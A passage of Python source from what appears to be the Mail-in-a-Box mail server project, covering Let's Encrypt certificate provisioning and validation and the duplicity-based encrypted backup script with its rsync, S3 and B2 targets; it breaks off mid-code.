What domains should we provision certificates for? And what # errors prevent provisioning for other domains. domains, domains_cant_provision = get_certificates_to_provision(env, limit_domains=limit_domains) # Build a list of what happened on each domain or domain-set. ret = [] for domain, error in domains_cant_provision.items(): ret.append({ "domains": [domain], "log": [error], "result": "skipped", }) # Break into groups by DNS zone: Group every domain with its parent domain, if # its parent domain is in the list of domains to request a certificate for. # Start with the zones so that if the zone doesn't need a certificate itself, # its children will still be grouped together. Sort the provision domains to # put parents ahead of children. # Since Let's Encrypt requests are limited to 100 domains at a time, # we'll create a list of lists of domains where the inner lists have # at most 100 items. By sorting we also get the DNS zone domain as the first # entry in each list (unless we overflow beyond 100) which ends up as the # primary domain listed in each certificate. from dns_update import get_dns_zones certs = { } for zone, _zonefile in get_dns_zones(env): certs[zone] = [[]] for domain in sort_domains(domains, env): # Does the domain end with any domain we've seen so far. for parent in certs: if domain.endswith("." + parent): # Add this to the parent's list of domains. # Start a new group if the list already has # 100 items. if len(certs[parent][-1]) == 100: certs[parent].append([]) certs[parent][-1].append(domain) break else: # This domain is not a child of any domain we've seen yet, so # start a new group. This shouldn't happen since every zone # was already added. certs[domain] = [[domain]] # Flatten to a list of lists of domains (from a mapping). Remove empty # lists (zones with no domains that need certs). certs = functools.reduce(operator.iadd, certs.values(), []) certs = [_ for _ in certs if len(_) > 0] # Prepare to provision. # Where should we put our Let's Encrypt account info and state cache. account_path = os.path.join(env['STORAGE_ROOT'], 'ssl/lets_encrypt') if not os.path.exists(account_path): os.mkdir(account_path) # Provision certificates. for domain_list in certs: ret.append({ "domains": domain_list, "log": [], }) try: # Create a CSR file for our master private key so that certbot # uses our private key. key_file = os.path.join(env['STORAGE_ROOT'], 'ssl', 'ssl_private_key.pem') with tempfile.NamedTemporaryFile() as csr_file: # We could use openssl, but certbot requires # that the CN domain and SAN domains match # the domain list passed to certbot, and adding # SAN domains openssl req is ridiculously complicated. # subprocess.check_output([ # "openssl", "req", "-new", # "-key", key_file, # "-out", csr_file.name, # "-subj", "/CN=" + domain_list[0], # "-sha256" ]) from cryptography import x509 from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives.serialization import Encoding from cryptography.hazmat.primitives import hashes from cryptography.x509.oid import NameOID builder = x509.CertificateSigningRequestBuilder() builder = builder.subject_name(x509.Name([ x509.NameAttribute(NameOID.COMMON_NAME, domain_list[0]) ])) builder = builder.add_extension(x509.BasicConstraints(ca=False, path_length=None), critical=True) builder = builder.add_extension(x509.SubjectAlternativeName( [x509.DNSName(d) for d in domain_list] ), critical=False) request = builder.sign(load_pem(load_cert_chain(key_file)[0]), hashes.SHA256(), default_backend()) with open(csr_file.name, "wb") as f: f.write(request.public_bytes(Encoding.PEM)) # Provision, writing to a temporary file. webroot = os.path.join(account_path, 'webroot') os.makedirs(webroot, exist_ok=True) with tempfile.TemporaryDirectory() as d: cert_file = os.path.join(d, 'cert_and_chain.pem') print("Provisioning TLS certificates for " + ", ".join(domain_list) + ".") certbotret = subprocess.check_output([ "certbot", "certonly", #"-v", # just enough to see ACME errors "--non-interactive", # will fail if user hasn't registered during Mail-in-a-Box setup "-d", ",".join(domain_list), # first will be main domain "--csr", csr_file.name, # use our private key; unfortunately this doesn't work with auto-renew so we need to save cert manually "--cert-path", os.path.join(d, 'cert'), # we only use the full chain "--chain-path", os.path.join(d, 'chain'), # we only use the full chain "--fullchain-path", cert_file, "--webroot", "--webroot-path", webroot, "--config-dir", account_path, #"--staging", ], stderr=subprocess.STDOUT).decode("utf8") install_cert_copy_file(cert_file, env) ret[-1]["log"].append(certbotret) ret[-1]["result"] = "installed" except subprocess.CalledProcessError as e: ret[-1]["log"].append(e.output.decode("utf8")) ret[-1]["result"] = "error" except Exception as e: ret[-1]["log"].append(str(e)) ret[-1]["result"] = "error" # Run post-install steps. ret.extend(post_install_func(env)) # Return what happened with each certificate request. return ret def provision_certificates_cmdline(): import sys from exclusiveprocess import Lock from utils import load_environment Lock(die=True).forever() env = load_environment() quiet = False domains = [] for arg in sys.argv[1:]: if arg == "-q": quiet = True else: domains.append(arg) # Go. status = provision_certificates(env, limit_domains=domains) # Show what happened. for request in status: if isinstance(request, str): print(request) else: if quiet and request['result'] == 'skipped': continue print(request['result'] + ":", ", ".join(request['domains']) + ":") for line in request["log"]: print(line) print() # INSTALLING A NEW CERTIFICATE FROM THE CONTROL PANEL def create_csr(domain, ssl_key, country_code, env): return shell("check_output", [ "openssl", "req", "-new", "-key", ssl_key, "-sha256", "-subj", f"/C={country_code}/CN={domain}"]) def install_cert(domain, ssl_cert, ssl_chain, env, raw=False): # Write the combined cert+chain to a temporary path and validate that it is OK. # The certificate always goes above the chain. import tempfile fd, fn = tempfile.mkstemp('.pem') os.write(fd, (ssl_cert + '\n' + ssl_chain).encode("ascii")) os.close(fd) # Do validation on the certificate before installing it. ssl_private_key = os.path.join(os.path.join(env["STORAGE_ROOT"], 'ssl', 'ssl_private_key.pem')) cert_status, cert_status_details = check_certificate(domain, fn, ssl_private_key) if cert_status != "OK": if cert_status == "SELF-SIGNED": cert_status = "This is a self-signed certificate. I can't install that." os.unlink(fn) if cert_status_details is not None: cert_status += " " + cert_status_details return cert_status # Copy certificate into ssl directory. install_cert_copy_file(fn, env) # Run post-install steps. ret = post_install_func(env) if raw: return ret return "\n".join(ret) def install_cert_copy_file(fn, env): # Where to put it? # Make a unique path for the certificate. from cryptography.hazmat.primitives import hashes from binascii import hexlify cert = load_pem(load_cert_chain(fn)[0]) _all_domains, cn = get_certificate_domains(cert) path = "{}-{}-{}.pem".format( safe_domain_name(cn), # common name, which should be filename safe because it is IDNA-encoded, but in case of a malformed cert make sure it's ok to use as a filename cert.not_valid_after.date().isoformat().replace("-", ""), # expiration date hexlify(cert.fingerprint(hashes.SHA256())).decode("ascii")[0:8], # fingerprint prefix ) ssl_certificate = os.path.join(os.path.join(env["STORAGE_ROOT"], 'ssl', path)) # Install the certificate. os.makedirs(os.path.dirname(ssl_certificate), exist_ok=True) shutil.move(fn, ssl_certificate) def post_install_func(env): ret = [] # Get the certificate to use for PRIMARY_HOSTNAME. ssl_certificates = get_ssl_certificates(env) cert = get_domain_ssl_files(env['PRIMARY_HOSTNAME'], ssl_certificates, env, use_main_cert=False) if not cert: # Ruh-row, we don't have any certificate usable # for the primary hostname. ret.append("there is no valid certificate for " + env['PRIMARY_HOSTNAME']) # Symlink the best cert for PRIMARY_HOSTNAME to the system # certificate path, which is hard-coded for various purposes, and then # restart postfix and dovecot. system_ssl_certificate = os.path.join(os.path.join(env["STORAGE_ROOT"], 'ssl', 'ssl_certificate.pem')) if cert and os.readlink(system_ssl_certificate) != cert['certificate']: # Update symlink. ret.append("updating primary certificate") ssl_certificate = cert['certificate'] os.unlink(system_ssl_certificate) os.symlink(ssl_certificate, system_ssl_certificate) # Restart postfix and dovecot so they pick up the new file. shell('check_call', ["/usr/sbin/service", "postfix", "restart"]) shell('check_call', ["/usr/sbin/service", "dovecot", "restart"]) ret.append("mail services restarted") # The DANE TLSA record will remain valid so long as the private key # hasn't changed. We don't ever change the private key automatically. # If the user does it, they must manually update DNS. # Update the web configuration so nginx picks up the new certificate file. from web_update import do_web_update ret.append( do_web_update(env) ) return ret # VALIDATION OF CERTIFICATES def check_certificate(domain, ssl_certificate, ssl_private_key, warn_if_expiring_soon=10, rounded_time=False, just_check_domain=False): # Check that the ssl_certificate & ssl_private_key files are good # for the provided domain. from cryptography.hazmat.primitives.asymmetric.rsa import RSAPrivateKey from cryptography.x509 import Certificate # The ssl_certificate file may contain a chain of certificates. We'll # need to split that up before we can pass anything to openssl or # parse them in Python. Parse it with the cryptography library. try: ssl_cert_chain = load_cert_chain(ssl_certificate) cert = load_pem(ssl_cert_chain[0]) if not isinstance(cert, Certificate): raise ValueError("This is not a certificate file.") except ValueError as e: return ("There is a problem with the certificate file: %s" % str(e), None) # First check that the domain name is one of the names allowed by # the certificate. if domain is not None: certificate_names, _cert_primary_name = get_certificate_domains(cert) # Check that the domain appears among the acceptable names, or a wildcard # form of the domain name (which is a stricter check than the specs but # should work in normal cases). wildcard_domain = re.sub(r"^[^\.]+", "*", domain) if domain not in certificate_names and wildcard_domain not in certificate_names: return ("The certificate is for the wrong domain name. It is for %s." % ", ".join(sorted(certificate_names)), None) # Second, check that the certificate matches the private key. if ssl_private_key is not None: try: with open(ssl_private_key, 'rb') as f: priv_key = load_pem(f.read()) except ValueError as e: return (f"The private key file {ssl_private_key} is not a private key file: {e!s}", None) if not isinstance(priv_key, RSAPrivateKey): return ("The private key file %s is not a private key file." % ssl_private_key, None) if priv_key.public_key().public_numbers() != cert.public_key().public_numbers(): return ("The certificate does not correspond to the private key at %s." % ssl_private_key, None) # We could also use the openssl command line tool to get the modulus # listed in each file. The output of each command below looks like "Modulus=XXXXX". # $ openssl rsa -inform PEM -noout -modulus -in ssl_private_key # $ openssl x509 -in ssl_certificate -noout -modulus # Third, check if the certificate is self-signed. Return a special flag string. if cert.issuer == cert.subject: return ("SELF-SIGNED", None) # When selecting which certificate to use for non-primary domains, we check if the primary # certificate or a www-parent-domain certificate is good for the domain. There's no need # to run extra checks beyond this point. if just_check_domain: return ("OK", None) # Check that the certificate hasn't expired. The datetimes returned by the # certificate are 'naive' and in UTC. We need to get the current time in UTC. import datetime now = datetime.datetime.utcnow() if not(cert.not_valid_before <= now <= cert.not_valid_after): return (f"The certificate has expired or is not yet valid. It is valid from {cert.not_valid_before} to {cert.not_valid_after}.", None) # Next validate that the certificate is valid. This checks whether the certificate # is self-signed, that the chain of trust makes sense, that it is signed by a CA # that Ubuntu has installed on this machine's list of CAs, and I think that it hasn't # expired. # The certificate chain has to be passed separately and is given via STDIN. # This command returns a non-zero exit status in most cases, so trap errors. retcode, verifyoutput = shell('check_output', [ "openssl", "verify", "-verbose", "-purpose", "sslserver", "-policy_check",] + ([] if len(ssl_cert_chain) == 1 else ["-untrusted", "/proc/self/fd/0"]) + [ssl_certificate], input=b"\n\n".join(ssl_cert_chain[1:]), trap=True) if "self signed" in verifyoutput: # Certificate is self-signed. Probably we detected this above. return ("SELF-SIGNED", None) elif retcode != 0: if "unable to get local issuer certificate" in verifyoutput: return ("The certificate is missing an intermediate chain or the intermediate chain is incorrect or incomplete. (%s)" % verifyoutput, None) # There is some unknown problem. Return the `openssl verify` raw output. return ("There is a problem with the certificate.", verifyoutput.strip()) else: # `openssl verify` returned a zero exit status so the cert is currently # good. # But is it expiring soon? cert_expiration_date = cert.not_valid_after ndays = (cert_expiration_date-now).days if not rounded_time or ndays <= 10: # Yikes better renew soon! expiry_info = "The certificate expires in %d days on %s." % (ndays, cert_expiration_date.date().isoformat()) else: # We'll renew it with Lets Encrypt. expiry_info = "The certificate expires on %s." % cert_expiration_date.date().isoformat() if warn_if_expiring_soon and ndays <= warn_if_expiring_soon: # Warn on day 10 to give 4 days for us to automatically renew the # certificate, which occurs on day 14. return ("The certificate is expiring soon: " + expiry_info, None) # Return the special OK code. return ("OK", expiry_info) def load_cert_chain(pemfile): # A certificate .pem file may contain a chain of certificates. # Load the file and split them apart. re_pem = rb"(-+BEGIN (?:.+)-+[\r\n]+(?:[A-Za-z0-9+/=]{1,64}[\r\n]+)+-+END (?:.+)-+[\r\n]+)" with open(pemfile, "rb") as f: pem = f.read() + b"\n" # ensure trailing newline pemblocks = re.findall(re_pem, pem) if len(pemblocks) == 0: msg = "File does not contain valid PEM data." raise ValueError(msg) return pemblocks def load_pem(pem): # Parse a "---BEGIN .... END---" PEM string and return a Python object for it # using classes from the cryptography package. from cryptography.x509 import load_pem_x509_certificate from cryptography.hazmat.primitives import serialization from cryptography.hazmat.backends import default_backend pem_type = re.match(b"-+BEGIN (.*?)-+[\r\n]", pem) if pem_type is None: msg = "File is not a valid PEM-formatted file." raise ValueError(msg) pem_type = pem_type.group(1) if pem_type in {b"RSA PRIVATE KEY", b"PRIVATE KEY"}: return serialization.load_pem_private_key(pem, password=None, backend=default_backend()) if pem_type == b"CERTIFICATE": return load_pem_x509_certificate(pem, default_backend()) raise ValueError("Unsupported PEM object type: " + pem_type.decode("ascii", "replace")) def get_certificate_domains(cert): from cryptography.x509 import DNSName, ExtensionNotFound, OID_COMMON_NAME, OID_SUBJECT_ALTERNATIVE_NAME import idna names = set() cn = None # The domain may be found in the Subject Common Name (CN). This comes back as an IDNA (ASCII) # string, which is the format we store domains in - so good. try: cn = cert.subject.get_attributes_for_oid(OID_COMMON_NAME)[0].value names.add(cn) except IndexError: # No common name? Certificate is probably generated incorrectly. # But we'll let it error-out when it doesn't find the domain. pass # ... or be one of the Subject Alternative Names. The cryptography library handily IDNA-decodes # the names for us. We must encode back to ASCII, but wildcard certificates can't pass through # IDNA encoding/decoding so we must special-case. See https://github.com/pyca/cryptography/pull/2071. def idna_decode_dns_name(dns_name): if dns_name.startswith("*."): return "*." + idna.encode(dns_name[2:]).decode('ascii') else: return idna.encode(dns_name).decode('ascii') try: sans = cert.extensions.get_extension_for_oid(OID_SUBJECT_ALTERNATIVE_NAME).value.get_values_for_type(DNSName) for san in sans: names.add(idna_decode_dns_name(san)) except ExtensionNotFound: pass return names, cn if __name__ == "__main__": # Provision certificates. provision_certificates_cmdline() File: management/backup.py #!/usr/local/lib/mailinabox/env/bin/python # This script performs a backup of all user data: # 1) System services are stopped. # 2) STORAGE_ROOT/backup/before-backup is executed if it exists. # 3) An incremental encrypted backup is made using duplicity. # 4) The stopped services are restarted. # 5) STORAGE_ROOT/backup/after-backup is executed if it exists. import os, os.path, re, datetime, sys import dateutil.parser, dateutil.relativedelta, dateutil.tz import rtyaml from exclusiveprocess import Lock from utils import load_environment, shell, wait_for_service def backup_status(env): # If backups are disabled, return no status. config = get_backup_config(env) if config["target"] == "off": return { } # Query duplicity to get a list of all full and incremental # backups available. backups = { } now = datetime.datetime.now(dateutil.tz.tzlocal()) backup_root = os.path.join(env["STORAGE_ROOT"], 'backup') backup_cache_dir = os.path.join(backup_root, 'cache') def reldate(date, ref, clip): if ref < date: return clip rd = dateutil.relativedelta.relativedelta(ref, date) if rd.years > 1: return "%d years, %d months" % (rd.years, rd.months) if rd.years == 1: return "%d year, %d months" % (rd.years, rd.months) if rd.months > 1: return "%d months, %d days" % (rd.months, rd.days) if rd.months == 1: return "%d month, %d days" % (rd.months, rd.days) if rd.days >= 7: return "%d days" % rd.days if rd.days > 1: return "%d days, %d hours" % (rd.days, rd.hours) if rd.days == 1: return "%d day, %d hours" % (rd.days, rd.hours) return "%d hours, %d minutes" % (rd.hours, rd.minutes) # Get duplicity collection status and parse for a list of backups. def parse_line(line): keys = line.strip().split() date = dateutil.parser.parse(keys[1]).astimezone(dateutil.tz.tzlocal()) return { "date": keys[1], "date_str": date.strftime("%Y-%m-%d %X") + " " + now.tzname(), "date_delta": reldate(date, now, "the future?"), "full": keys[0] == "full", "size": 0, # collection-status doesn't give us the size "volumes": int(keys[2]), # number of archive volumes for this backup (not really helpful) } code, collection_status = shell('check_output', [ "/usr/bin/duplicity", "collection-status", "--archive-dir", backup_cache_dir, "--gpg-options", "'--cipher-algo=AES256'", "--log-fd", "1", *get_duplicity_additional_args(env), get_duplicity_target_url(config) ], get_duplicity_env_vars(env), trap=True) if code != 0: # Command failed. This is likely due to an improperly configured remote # destination for the backups or the last backup job terminated unexpectedly. raise Exception("Something is wrong with the backup: " + collection_status) for line in collection_status.split('\n'): if line.startswith((" full", " inc")): backup = parse_line(line) backups[backup["date"]] = backup # Look at the target directly to get the sizes of each of the backups. There is more than one file per backup. # Starting with duplicity in Ubuntu 18.04, "signatures" files have dates in their # filenames that are a few seconds off the backup date and so don't line up # with the list of backups we have. Track unmatched files so we know how much other # space is used for those. unmatched_file_size = 0 for fn, size in list_target_files(config): m = re.match(r"duplicity-(full|full-signatures|(inc|new-signatures)\.(?P<incbase>\d+T\d+Z)\.to)\.(?P<date>\d+T\d+Z)\.", fn) if not m: continue # not a part of a current backup chain key = m.group("date") if key in backups: backups[key]["size"] += size else: unmatched_file_size += size # Ensure the rows are sorted reverse chronologically. # This is relied on by should_force_full() and the next step. backups = sorted(backups.values(), key = lambda b : b["date"], reverse=True) # Get the average size of incremental backups, the size of the # most recent full backup, and the date of the most recent # backup and the most recent full backup. incremental_count = 0 incremental_size = 0 first_date = None first_full_size = None first_full_date = None for bak in backups: if first_date is None: first_date = dateutil.parser.parse(bak["date"]) if bak["full"]: first_full_size = bak["size"] first_full_date = dateutil.parser.parse(bak["date"]) break incremental_count += 1 incremental_size += bak["size"] # When will the most recent backup be deleted? It won't be deleted if the next # backup is incremental, because the increments rely on all past increments. # So first guess how many more incremental backups will occur until the next # full backup. That full backup frees up this one to be deleted. But, the backup # must also be at least min_age_in_days old too. deleted_in = None if incremental_count > 0 and incremental_size > 0 and first_full_size is not None: # How many days until the next incremental backup? First, the part of # the algorithm based on increment sizes: est_days_to_next_full = (.5 * first_full_size - incremental_size) / (incremental_size/incremental_count) est_time_of_next_full = first_date + datetime.timedelta(days=est_days_to_next_full) # ...And then the part of the algorithm based on full backup age: est_time_of_next_full = min(est_time_of_next_full, first_full_date + datetime.timedelta(days=config["min_age_in_days"]*10+1)) # It still can't be deleted until it's old enough. est_deleted_on = max(est_time_of_next_full, first_date + datetime.timedelta(days=config["min_age_in_days"])) deleted_in = "approx. %d days" % round((est_deleted_on-now).total_seconds()/60/60/24 + .5) # When will a backup be deleted? Set the deleted_in field of each backup. saw_full = False for bak in backups: if deleted_in: # The most recent increment in a chain and all of the previous backups # it relies on are deleted at the same time. bak["deleted_in"] = deleted_in if bak["full"]: # Reset when we get to a full backup. A new chain start *next*. saw_full = True deleted_in = None elif saw_full and not deleted_in: # We're now on backups prior to the most recent full backup. These are # free to be deleted as soon as they are min_age_in_days old. deleted_in = reldate(now, dateutil.parser.parse(bak["date"]) + datetime.timedelta(days=config["min_age_in_days"]), "on next daily backup") bak["deleted_in"] = deleted_in return { "backups": backups, "unmatched_file_size": unmatched_file_size, } def should_force_full(config, env): # Force a full backup when the total size of the increments # since the last full backup is greater than half the size # of that full backup. inc_size = 0 for bak in backup_status(env)["backups"]: if not bak["full"]: # Scan through the incremental backups cumulating # size... inc_size += bak["size"] else: # ...until we reach the most recent full backup. # Return if we should to a full backup, which is based # on the size of the increments relative to the full # backup, as well as the age of the full backup. if inc_size > .5*bak["size"]: return True if dateutil.parser.parse(bak["date"]) + datetime.timedelta(days=config["min_age_in_days"]*10+1) < datetime.datetime.now(dateutil.tz.tzlocal()): return True return False else: # If we got here there are no (full) backups, so make one. # (I love for/else blocks. Here it's just to show off.) return True def get_passphrase(env): # Get the encryption passphrase. secret_key.txt is 2048 random # bits base64-encoded and with line breaks every 65 characters. # gpg will only take the first line of text, so sanity check that # that line is long enough to be a reasonable passphrase. It # only needs to be 43 base64-characters to match AES256's key # length of 32 bytes. backup_root = os.path.join(env["STORAGE_ROOT"], 'backup') with open(os.path.join(backup_root, 'secret_key.txt'), encoding="utf-8") as f: passphrase = f.readline().strip() if len(passphrase) < 43: raise Exception("secret_key.txt's first line is too short!") return passphrase def get_duplicity_target_url(config): target = config["target"] if get_target_type(config) == "s3": from urllib.parse import urlsplit, urlunsplit target = list(urlsplit(target)) # Although we store the S3 hostname in the target URL, # duplicity no longer accepts it in the target URL. The hostname in # the target URL must be the bucket name. The hostname is passed # via get_duplicity_additional_args. Move the first part of the # path (the bucket name) into the hostname URL component, and leave # the rest for the path. (The S3 region name is also stored in the # hostname part of the URL, in the username portion, which we also # have to drop here). target[1], target[2] = target[2].lstrip('/').split('/', 1) target = urlunsplit(target) return target def get_duplicity_additional_args(env): config = get_backup_config(env) if get_target_type(config) == 'rsync': # Extract a port number for the ssh transport. Duplicity accepts the # optional port number syntax in the target, but it doesn't appear to act # on it, so we set the ssh port explicitly via the duplicity options. from urllib.parse import urlsplit try: port = urlsplit(config["target"]).port except ValueError: port = 22 if port is None: port = 22 return [ f"--ssh-options='-i /root/.ssh/id_rsa_miab -p {port}'", f"--rsync-options='-e \"/usr/bin/ssh -oStrictHostKeyChecking=no -oBatchMode=yes -p {port} -i /root/.ssh/id_rsa_miab\"'", ] elif get_target_type(config) == 's3': # See note about hostname in get_duplicity_target_url. # The region name, which is required by some non-AWS endpoints, # is saved inside the username portion of the URL. from urllib.parse import urlsplit, urlunsplit target = urlsplit(config["target"]) endpoint_url = urlunsplit(("https", target.hostname, '', '', '')) args = ["--s3-endpoint-url", endpoint_url] if target.username: # region name is stuffed here args += ["--s3-region-name", target.username] return args return [] def get_duplicity_env_vars(env): config = get_backup_config(env) env = { "PASSPHRASE" : get_passphrase(env) } if get_target_type(config) == 's3': env["AWS_ACCESS_KEY_ID"] = config["target_user"] env["AWS_SECRET_ACCESS_KEY"] = config["target_pass"] return env def get_target_type(config): return config["target"].split(":")[0] def perform_backup(full_backup): env = load_environment() # Create an global exclusive lock so that the backup script # cannot be run more than one. Lock(die=True).forever() config = get_backup_config(env) backup_root = os.path.join(env["STORAGE_ROOT"], 'backup') backup_cache_dir = os.path.join(backup_root, 'cache') backup_dir = os.path.join(backup_root, 'encrypted') # Are backups disabled? if config["target"] == "off": return # On the first run, always do a full backup. Incremental # will fail. Otherwise do a full backup when the size of # the increments since the most recent full backup are # large. try: full_backup = full_backup or should_force_full(config, env) except Exception as e: # This was the first call to duplicity, and there might # be an error already. print(e) sys.exit(1) # Stop services. def service_command(service, command, quit=None): # Execute silently, but if there is an error then display the output & exit. code, ret = shell('check_output', ["/usr/sbin/service", service, command], capture_stderr=True, trap=True) if code != 0: print(ret) if quit: sys.exit(code) service_command("php8.0-fpm", "stop", quit=True) service_command("postfix", "stop", quit=True) service_command("dovecot", "stop", quit=True) service_command("postgrey", "stop", quit=True) # Execute a pre-backup script that copies files outside the homedir. # Run as the STORAGE_USER user, not as root. Pass our settings in # environment variables so the script has access to STORAGE_ROOT. pre_script = os.path.join(backup_root, 'before-backup') if os.path.exists(pre_script): shell('check_call', ['su', env['STORAGE_USER'], '-c', pre_script, config["target"]], env=env) # Run a backup of STORAGE_ROOT (but excluding the backups themselves!). # --allow-source-mismatch is needed in case the box's hostname is changed # after the first backup. See #396. try: shell('check_call', [ "/usr/bin/duplicity", "full" if full_backup else "incr", "--verbosity", "warning", "--no-print-statistics", "--archive-dir", backup_cache_dir, "--exclude", backup_root, "--volsize", "250", "--gpg-options", "'--cipher-algo=AES256'", "--allow-source-mismatch", *get_duplicity_additional_args(env), env["STORAGE_ROOT"], get_duplicity_target_url(config), ], get_duplicity_env_vars(env)) finally: # Start services again. service_command("postgrey", "start", quit=False) service_command("dovecot", "start", quit=False) service_command("postfix", "start", quit=False) service_command("php8.0-fpm", "start", quit=False) # Remove old backups. This deletes all backup data no longer needed # from more than 3 days ago. shell('check_call', [ "/usr/bin/duplicity", "remove-older-than", "%dD" % config["min_age_in_days"], "--verbosity", "error", "--archive-dir", backup_cache_dir, "--force", *get_duplicity_additional_args(env), get_duplicity_target_url(config) ], get_duplicity_env_vars(env)) # From duplicity's manual: # "This should only be necessary after a duplicity session fails or is # aborted prematurely." # That may be unlikely here but we may as well ensure we tidy up if # that does happen - it might just have been a poorly timed reboot. shell('check_call', [ "/usr/bin/duplicity", "cleanup", "--verbosity", "error", "--archive-dir", backup_cache_dir, "--force", *get_duplicity_additional_args(env), get_duplicity_target_url(config) ], get_duplicity_env_vars(env)) # Change ownership of backups to the user-data user, so that the after-bcakup # script can access them. if get_target_type(config) == 'file': shell('check_call', ["/bin/chown", "-R", env["STORAGE_USER"], backup_dir]) # Execute a post-backup script that does the copying to a remote server. # Run as the STORAGE_USER user, not as root. Pass our settings in # environment variables so the script has access to STORAGE_ROOT. post_script = os.path.join(backup_root, 'after-backup') if os.path.exists(post_script): shell('check_call', ['su', env['STORAGE_USER'], '-c', post_script, config["target"]], env=env) # Our nightly cron job executes system status checks immediately after this # backup. Since it checks that dovecot and postfix are running, block for a # bit (maximum of 10 seconds each) to give each a chance to finish restarting # before the status checks might catch them down. See #381. wait_for_service(25, True, env, 10) wait_for_service(993, True, env, 10) def run_duplicity_verification(): env = load_environment() backup_root = os.path.join(env["STORAGE_ROOT"], 'backup') config = get_backup_config(env) backup_cache_dir = os.path.join(backup_root, 'cache') shell('check_call', [ "/usr/bin/duplicity", "--verbosity", "info", "verify", "--compare-data", "--archive-dir", backup_cache_dir, "--exclude", backup_root, *get_duplicity_additional_args(env), get_duplicity_target_url(config), env["STORAGE_ROOT"], ], get_duplicity_env_vars(env)) def run_duplicity_restore(args): env = load_environment() config = get_backup_config(env) backup_cache_dir = os.path.join(env["STORAGE_ROOT"], 'backup', 'cache') shell('check_call', [ "/usr/bin/duplicity", "restore", "--archive-dir", backup_cache_dir, *get_duplicity_additional_args(env), get_duplicity_target_url(config), *args], get_duplicity_env_vars(env)) def print_duplicity_command(): import shlex env = load_environment() config = get_backup_config(env) backup_cache_dir = os.path.join(env["STORAGE_ROOT"], 'backup', 'cache') for k, v in get_duplicity_env_vars(env).items(): print(f"export {k}={shlex.quote(v)}") print("duplicity", "{command}", shlex.join([ "--archive-dir", backup_cache_dir, *get_duplicity_additional_args(env), get_duplicity_target_url(config) ])) def list_target_files(config): import urllib.parse try: target = urllib.parse.urlparse(config["target"]) except ValueError: return "invalid target" if target.scheme == "file": return [(fn, os.path.getsize(os.path.join(target.path, fn))) for fn in os.listdir(target.path)] elif target.scheme == "rsync": rsync_fn_size_re = re.compile(r'.* ([^ ]*) [^ ]* [^ ]* (.*)') rsync_target = '{host}:{path}' # Strip off any trailing port specifier because it's not valid in rsync's # DEST syntax. Explicitly set the port number for the ssh transport. user_host, *_ = target.netloc.rsplit(':', 1) try: port = target.port except ValueError: port = 22 if port is None: port = 22 target_path = target.path if not target_path.endswith('/'): target_path = target_path + '/' if target_path.startswith('/'): target_path = target_path[1:] rsync_command = [ 'rsync', '-e', f'/usr/bin/ssh -i /root/.ssh/id_rsa_miab -oStrictHostKeyChecking=no -oBatchMode=yes -p {port}', '--list-only', '-r', rsync_target.format( host=user_host, path=target_path) ] code, listing = shell('check_output', rsync_command, trap=True, capture_stderr=True) if code == 0: ret = [] for l in listing.split('\n'): match = rsync_fn_size_re.match(l) if match: ret.append( (match.groups()[1], int(match.groups()[0].replace(',',''))) ) return ret else: if 'Permission denied (publickey).' in listing: reason = "Invalid user or check you correctly copied the SSH key." elif 'No such file or directory' in listing: reason = f"Provided path {target_path} is invalid." elif 'Network is unreachable' in listing: reason = f"The IP address {target.hostname} is unreachable." elif 'Could not resolve hostname' in listing: reason = f"The hostname {target.hostname} cannot be resolved." else: reason = ("Unknown error." "Please check running 'management/backup.py --verify'" "from mailinabox sources to debug the issue.") msg = f"Connection to rsync host failed: {reason}" raise ValueError(msg) elif target.scheme == "s3": import boto3.s3 from botocore.exceptions import ClientError # separate bucket from path in target bucket = target.path[1:].split('/')[0] path = '/'.join(target.path[1:].split('/')[1:]) + '/' # If no prefix is specified, set the path to '', otherwise boto won't list the files if path == '/': path = '' if bucket == "": msg = "Enter an S3 bucket name." raise ValueError(msg) # connect to the region & bucket try: s3 = boto3.client('s3', \ endpoint_url=f'https://{target.hostname}', \ aws_access_key_id=config['target_user'], \ aws_secret_access_key=config['target_pass']) bucket_objects = s3.list_objects_v2(Bucket=bucket, Prefix=path)['Contents'] backup_list = [(key['Key'][len(path):], key['Size']) for key in bucket_objects] except ClientError as e: raise ValueError(e) return backup_list elif target.scheme == 'b2': from b2sdk.v1 import InMemoryAccountInfo, B2Api from b2sdk.v1.exception import NonExistentBucket info = InMemoryAccountInfo() b2_api = B2Api(info) # Extract information from target b2_application_keyid = target.netloc[:target.netloc.index(':')] b2_application_key = urllib.parse.unquote(target.netloc[target.netloc.index(':')+1:target.netloc.index('@')]) b2_bucket = target.netloc[target.netloc.index('@')+1:] try: b2_api.authorize_account("production", b2_application_keyid, b2_application_key) bucket = b2_api.get_bucket_by_name(b2_bucket) except NonExistentBucket: msg = "B2 Bucket does not exist. Please double check your information!" raise ValueError(msg) return [(key.file_name, key.size) for key, _ in bucket.ls()] else: raise ValueError(config["target"]) def backup_set_custom(env, target, target_user, target_pass, min_age): config = get_backup_config(env, for_save=True) # min_age must be an int if isinstance(min_age, str): min_age = int(min_age) config["target"] = target config["target_user"] = target_user config["target_pass"] = target_pass config["min_age_in_days"] = min_age # Validate. try: if config["target"] not in {"off", "local"}: # these aren't supported by the following function, which expects a full url in the target key, # which is what is there except when loading the config prior to saving list_target_files(config) except ValueError as e: return str(e) write_backup_config(env, config) return "OK" def get_backup_config(env, for_save=False, for_ui=False): backup_root = os.path.join(env["STORAGE_ROOT"], 'backup') # Defaults. config = { "min_age_in_days": 3, "target": "local", } # Merge in anything written to custom.yaml. try: with open(os.path.join(backup_root, 'custom.yaml'), encoding="utf-8") as f: custom_config = rtyaml.load(f) if not isinstance(custom_config, dict): raise ValueError # caught below config.update(custom_config) except: pass # When updating config.yaml, don't do any further processing on what we find. if for_save: return config # When passing this back to the admin to show the current settings, do not include # authentication details. The user will have to re-enter it. if for_ui: for field in ("target_user", "target_pass"): if field in config: del config[field] # helper fields for the admin config["file_target_directory"] = os.path.join(backup_root, 'encrypted') config["enc_pw_file"] = os.path.join(backup_root, 'secret_key.txt') if config["target"] == "local": # Expand to the full URL. config["target"] = "file://" + config["file_target_directory"] ssh_pub_key = os.path.join('/root', '.ssh', 'id_rsa_miab.pub') if os.path.exists(ssh_pub_key): with open(ssh_pub_key, encoding="utf-8") as f: config["ssh_pub_key"] = f.read() return config def write_backup_config(env, newconfig): backup_root = os.path.join(env["STORAGE_ROOT"], 'backup') with open(os.path.join(backup_root, 'custom.yaml'), "w", encoding="utf-8") as f: f.write(rtyaml.dump(newconfig)) if __name__ == "__main__": if sys.argv[-1] == "--verify": # Run duplicity's verification command to check a) the backup files # are readable, and b) report if they are up to date. 